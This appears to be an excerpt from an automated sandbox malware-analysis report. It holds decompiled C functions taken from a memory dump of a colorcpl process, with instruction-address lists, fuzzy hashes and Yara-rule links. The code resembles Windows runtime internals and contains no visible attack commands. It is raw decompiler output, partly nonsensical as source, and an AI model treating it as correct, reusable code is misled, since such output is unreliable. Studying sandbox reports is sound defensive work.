								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E06E4F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E06E2EEF0(0x6f079a0);
									__eflags =  *0x6f08210 - _t104; // 0xe22d88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x6f08210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E06E94888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E06E2EB70(_t95, 0x6f079a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E06E595D0();
											L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E06E595D0();
											L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E06E2EB70(_t93, 0x6f079a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E06E595D0();
										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E06E595D0();
										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E06E4F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                0x06e152a5
                                                                                                0x06e152ad
                                                                                                0x06e152b0
                                                                                                0x06e152b3
                                                                                                0x06e152b7
                                                                                                0x06e152ba
                                                                                                0x06e152bf
                                                                                                0x06e152c4
                                                                                                0x06e152cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e152ce
                                                                                                0x06e152d9
                                                                                                0x06e152dd
                                                                                                0x06e152e7
                                                                                                0x06e152f7
                                                                                                0x06e152f9
                                                                                                0x06e152fd
                                                                                                0x06e70dcf
                                                                                                0x06e70dd5
                                                                                                0x06e70dd6
                                                                                                0x06e70dd7
                                                                                                0x06e70dd8
                                                                                                0x06e70dd9
                                                                                                0x06e70dde
                                                                                                0x06e70ddf
                                                                                                0x06e70de0
                                                                                                0x06e70de1
                                                                                                0x06e70de2
                                                                                                0x06e70de5
                                                                                                0x06e70dea
                                                                                                0x06e70dec
                                                                                                0x06e70f60
                                                                                                0x06e70f64
                                                                                                0x06e70f70
                                                                                                0x06e70f76
                                                                                                0x06e70f79
                                                                                                0x06e70f79
                                                                                                0x00000000
                                                                                                0x06e70f64
                                                                                                0x06e70df2
                                                                                                0x06e70df7
                                                                                                0x06e70e04
                                                                                                0x06e70e0d
                                                                                                0x06e70e0d
                                                                                                0x06e70e10
                                                                                                0x06e70e1a
                                                                                                0x06e70e1c
                                                                                                0x06e70e4c
                                                                                                0x06e70e52
                                                                                                0x06e70e61
                                                                                                0x06e70e67
                                                                                                0x06e70e6b
                                                                                                0x06e70e70
                                                                                                0x06e70e76
                                                                                                0x06e70ed7
                                                                                                0x06e70edc
                                                                                                0x06e70ee0
                                                                                                0x06e70ee6
                                                                                                0x06e70eea
                                                                                                0x06e70eed
                                                                                                0x06e70ef0
                                                                                                0x06e70ef3
                                                                                                0x06e70ef6
                                                                                                0x06e70ef9
                                                                                                0x06e70efe
                                                                                                0x06e70f01
                                                                                                0x06e70f01
                                                                                                0x06e70f0b
                                                                                                0x06e70f12
                                                                                                0x06e70f16
                                                                                                0x06e70f18
                                                                                                0x06e70f1b
                                                                                                0x06e70f2c
                                                                                                0x06e70f31
                                                                                                0x06e70f31
                                                                                                0x06e70f35
                                                                                                0x06e70f39
                                                                                                0x06e70f3a
                                                                                                0x06e70f3c
                                                                                                0x06e70f3f
                                                                                                0x06e70f50
                                                                                                0x06e70f55
                                                                                                0x06e70f55
                                                                                                0x06e70f59
                                                                                                0x06e152eb
                                                                                                0x06e152f1
                                                                                                0x06e152f1
                                                                                                0x06e70e7d
                                                                                                0x06e70e84
                                                                                                0x06e70e88
                                                                                                0x06e70e8a
                                                                                                0x06e70e8d
                                                                                                0x06e70e9e
                                                                                                0x06e70ea3
                                                                                                0x06e70ea3
                                                                                                0x06e70ea7
                                                                                                0x06e70eaf
                                                                                                0x06e70eb3
                                                                                                0x06e70eb9
                                                                                                0x06e70eb9
                                                                                                0x06e70ebc
                                                                                                0x06e70ecd
                                                                                                0x06e70ecd
                                                                                                0x00000000
                                                                                                0x06e70eb3
                                                                                                0x06e70e21
                                                                                                0x06e70e2b
                                                                                                0x06e70e2f
                                                                                                0x06e70e30
                                                                                                0x06e70e3a
                                                                                                0x06e70e3f
                                                                                                0x06e70e41
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e70e47
                                                                                                0x00000000
                                                                                                0x06e70e47
                                                                                                0x06e70df9
                                                                                                0x06e70dfe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e70dfe
                                                                                                0x06e15303
                                                                                                0x06e15307
                                                                                                0x00000000
                                                                                                0x06e15309
                                                                                                0x00000000
                                                                                                0x06e15309
                                                                                                0x06e15307
                                                                                                0x06e152e9
                                                                                                0x06e152e9
                                                                                                0x00000000
                                                                                                0x06e152e9
                                                                                                0x06e1530e
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4499ccf136eeba21abcebd52a8b1f4f13691f7d9c0c4c8dbcc56d5d7356e2ea
                                                                                                • Instruction ID: c6b8fee306a1bb7297ea23399c50b69e610ad9091ace240845196f10bdcd6f68
                                                                                                • Opcode Fuzzy Hash: e4499ccf136eeba21abcebd52a8b1f4f13691f7d9c0c4c8dbcc56d5d7356e2ea
                                                                                                • Instruction Fuzzy Hash: D451EEB1205742AFD7A0EF64CC40B67BBE9FF80714F20191EE4A587691E770E844CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E42AE4 Relevance: .2, Instructions: 159COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E42AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x6f08204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x6f08208; // 0x6f08207
				_t8 = _t57 + 0x6f08208; // 0x6f08207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x6f08450; // 0xe217fe
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x6f0821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x6f06d5c; // 0x7f5d0654
							_t72 =  *0x6f06d5c; // 0x7f5d0654
							_t75 =  *0x6f06d5c; // 0x7f5d0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x6f06d5c; // 0x7f5d0654
							_t84 =  *0x6f06d5c; // 0x7f5d0654
							_t87 =  *0x6f06d5c; // 0x7f5d0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E06E5F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                0x06e42ae4
                                                                                                0x06e42aec
                                                                                                0x06e42aef
                                                                                                0x06e42af4
                                                                                                0x06e42af7
                                                                                                0x06e42afd
                                                                                                0x06e42b92
                                                                                                0x06e42b92
                                                                                                0x06e42b97
                                                                                                0x06e42b9c
                                                                                                0x06e42b9c
                                                                                                0x06e42b03
                                                                                                0x06e42b06
                                                                                                0x06e42b09
                                                                                                0x06e42b09
                                                                                                0x06e42b0f
                                                                                                0x06e42b15
                                                                                                0x06e42b15
                                                                                                0x06e42b1b
                                                                                                0x06e42b1e
                                                                                                0x06e42b21
                                                                                                0x06e42b26
                                                                                                0x06e42b29
                                                                                                0x06e42b81
                                                                                                0x06e42b84
                                                                                                0x06e42c0e
                                                                                                0x06e42c15
                                                                                                0x06e42c24
                                                                                                0x06e42c24
                                                                                                0x06e42b8a
                                                                                                0x06e42b8a
                                                                                                0x06e42b8a
                                                                                                0x06e42b8a
                                                                                                0x06e42b90
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42b4a
                                                                                                0x06e42b4a
                                                                                                0x06e42b4d
                                                                                                0x06e42b53
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42b55
                                                                                                0x06e42b58
                                                                                                0x06e42bb7
                                                                                                0x06e85d1b
                                                                                                0x06e85d37
                                                                                                0x06e85d47
                                                                                                0x06e85d53
                                                                                                0x06e42bbd
                                                                                                0x06e42bbd
                                                                                                0x06e42bbd
                                                                                                0x06e42bb7
                                                                                                0x06e42b5d
                                                                                                0x06e42c2f
                                                                                                0x06e85d5b
                                                                                                0x06e85d77
                                                                                                0x06e85d87
                                                                                                0x06e85d93
                                                                                                0x06e42c35
                                                                                                0x06e42c35
                                                                                                0x06e42c35
                                                                                                0x06e42c2f
                                                                                                0x06e42b65
                                                                                                0x06e42b9f
                                                                                                0x06e42ba2
                                                                                                0x06e42b67
                                                                                                0x06e42b67
                                                                                                0x06e42b69
                                                                                                0x06e42b6b
                                                                                                0x06e42b6e
                                                                                                0x06e42bc9
                                                                                                0x06e42bcc
                                                                                                0x06e42bcf
                                                                                                0x06e42bd4
                                                                                                0x06e42bd6
                                                                                                0x06e42bd6
                                                                                                0x06e42bdb
                                                                                                0x06e42c02
                                                                                                0x06e42c05
                                                                                                0x06e42c07
                                                                                                0x00000000
                                                                                                0x06e42c07
                                                                                                0x06e42be0
                                                                                                0x06e42c00
                                                                                                0x06e42c3f
                                                                                                0x06e42c3f
                                                                                                0x00000000
                                                                                                0x06e42c00
                                                                                                0x06e42be5
                                                                                                0x06e42be7
                                                                                                0x06e42bec
                                                                                                0x06e42bf4
                                                                                                0x06e42bf6
                                                                                                0x00000000
                                                                                                0x06e42bf6
                                                                                                0x06e42b70
                                                                                                0x06e42b76
                                                                                                0x06e42b2b
                                                                                                0x06e42b2b
                                                                                                0x06e42b2d
                                                                                                0x06e42b2f
                                                                                                0x06e42b32
                                                                                                0x06e42b35
                                                                                                0x06e42b3a
                                                                                                0x00000000
                                                                                                0x06e42b40
                                                                                                0x06e42b43
                                                                                                0x06e42b45
                                                                                                0x06e42b47
                                                                                                0x06e42b4a
                                                                                                0x06e42b4d
                                                                                                0x06e42b53
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42b53
                                                                                                0x06e42b78
                                                                                                0x06e42b78
                                                                                                0x06e42b7b
                                                                                                0x06e42b7e
                                                                                                0x00000000
                                                                                                0x06e42b7e
                                                                                                0x06e42b76
                                                                                                0x06e42ba5
                                                                                                0x06e42ba5
                                                                                                0x06e42ba8
                                                                                                0x06e42bad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42baf
                                                                                                0x06e42baf
                                                                                                0x06e42bc2
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b039971e82205d94855b93328a6ca8a16d507ba81ffa9056c3e88d965f6e61b1
                                                                                                • Instruction ID: 12ac958a77c868bc961254a1315dcf1383be994d70a764e53bf3751e65fce1a7
                                                                                                • Opcode Fuzzy Hash: b039971e82205d94855b93328a6ca8a16d507ba81ffa9056c3e88d965f6e61b1
                                                                                                • Instruction Fuzzy Hash: 5D51C076A002158FDB54EF2CD8809BDB7B2FB88700715845AFE56DB318D730AE51CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EDAE44 Relevance: .2, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E06EDAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E06EDC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E06EDACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E06EDFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E06EDEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E06E37D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E06ED1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E06EE1536(0x6f08ae4, (_t74 -  *0x6f08b04 >> 0x14) + (_t74 -  *0x6f08b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L06EDC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E06EDA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E06EBCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E06EDACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                                0x06edae44
                                                                                                0x06edae4c
                                                                                                0x06edae53
                                                                                                0x06edae55
                                                                                                0x06edae5c
                                                                                                0x06edae64
                                                                                                0x06edae68
                                                                                                0x06edae75
                                                                                                0x06edae75
                                                                                                0x06edae78
                                                                                                0x06edae7a
                                                                                                0x06edae7c
                                                                                                0x06edae7f
                                                                                                0x06edaea8
                                                                                                0x06edaeab
                                                                                                0x06edaead
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaeb3
                                                                                                0x06edaeb8
                                                                                                0x06edaebb
                                                                                                0x06edaebd
                                                                                                0x00000000
                                                                                                0x06edae81
                                                                                                0x06edae88
                                                                                                0x06edae8f
                                                                                                0x06edae9b
                                                                                                0x06edae96
                                                                                                0x06edae96
                                                                                                0x06edae96
                                                                                                0x06edaea0
                                                                                                0x06edaea3
                                                                                                0x06edaebf
                                                                                                0x06edaebf
                                                                                                0x06edaec3
                                                                                                0x06edaec9
                                                                                                0x06edaf0d
                                                                                                0x06edaf14
                                                                                                0x06edaf3d
                                                                                                0x06edaf3d
                                                                                                0x06edaf41
                                                                                                0x06edaf44
                                                                                                0x06edaf67
                                                                                                0x06edaf67
                                                                                                0x06edaf6a
                                                                                                0x06edafca
                                                                                                0x06edafd1
                                                                                                0x00000000
                                                                                                0x06edafd1
                                                                                                0x06edaf6c
                                                                                                0x06edaf6d
                                                                                                0x06edaf75
                                                                                                0x06edaf7c
                                                                                                0x06edaf7e
                                                                                                0x06edaf80
                                                                                                0x06edaf85
                                                                                                0x06edaf87
                                                                                                0x06edaf99
                                                                                                0x06edaf89
                                                                                                0x06edaf92
                                                                                                0x06edaf92
                                                                                                0x06edaf9e
                                                                                                0x06edafa1
                                                                                                0x06edafa3
                                                                                                0x06edafa9
                                                                                                0x06edafb0
                                                                                                0x06edafb2
                                                                                                0x06edafb4
                                                                                                0x06edafbc
                                                                                                0x06edafbc
                                                                                                0x06edafb4
                                                                                                0x06edafb0
                                                                                                0x00000000
                                                                                                0x06edafa1
                                                                                                0x06edaf4f
                                                                                                0x06edaf57
                                                                                                0x06edaf5c
                                                                                                0x06edaf5e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaf60
                                                                                                0x06edaf64
                                                                                                0x06edaf64
                                                                                                0x00000000
                                                                                                0x06edaf64
                                                                                                0x06edaf1a
                                                                                                0x06edaf25
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaf27
                                                                                                0x06edaf28
                                                                                                0x06edaf33
                                                                                                0x00000000
                                                                                                0x06edaed0
                                                                                                0x06edaed0
                                                                                                0x06edaed2
                                                                                                0x06edaee1
                                                                                                0x06edaee4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaee6
                                                                                                0x06edaeec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaefb
                                                                                                0x06edaf07
                                                                                                0x06edafd3
                                                                                                0x06edafdb
                                                                                                0x06edafdb
                                                                                                0x00000000
                                                                                                0x06edaf07
                                                                                                0x06edaed6
                                                                                                0x06edaed8
                                                                                                0x06edaedf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06edaedf
                                                                                                0x06edaec9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bedd4b2da8509816cff47c9f58216d43e7da7c908e1130323b0a97ab775c14a6
                                                                                                • Instruction ID: 4b5ac502008b483ce16f3dae465d2f939cd79c4fad808647a6426e2f03447656
                                                                                                • Opcode Fuzzy Hash: bedd4b2da8509816cff47c9f58216d43e7da7c908e1130323b0a97ab775c14a6
                                                                                                • Instruction Fuzzy Hash: 5941F7B1B003115BDBA5DB2DCC84B7BB39AAF84624F246279FC2687290D734DA43C790
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3DBE9 Relevance: .1, Instructions: 149COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E06E3DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E06E1CC50(E06E14510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E06E37D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E06EE8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E06E32280(_t58, _v44);
						E06E3DD82(_v44, _t102, _t98);
						E06E3B944(_t102, _v5);
						return E06E2FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x6f08628; // 0x0
							_v28 = _t67;
							_t68 =  *0x6f0862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
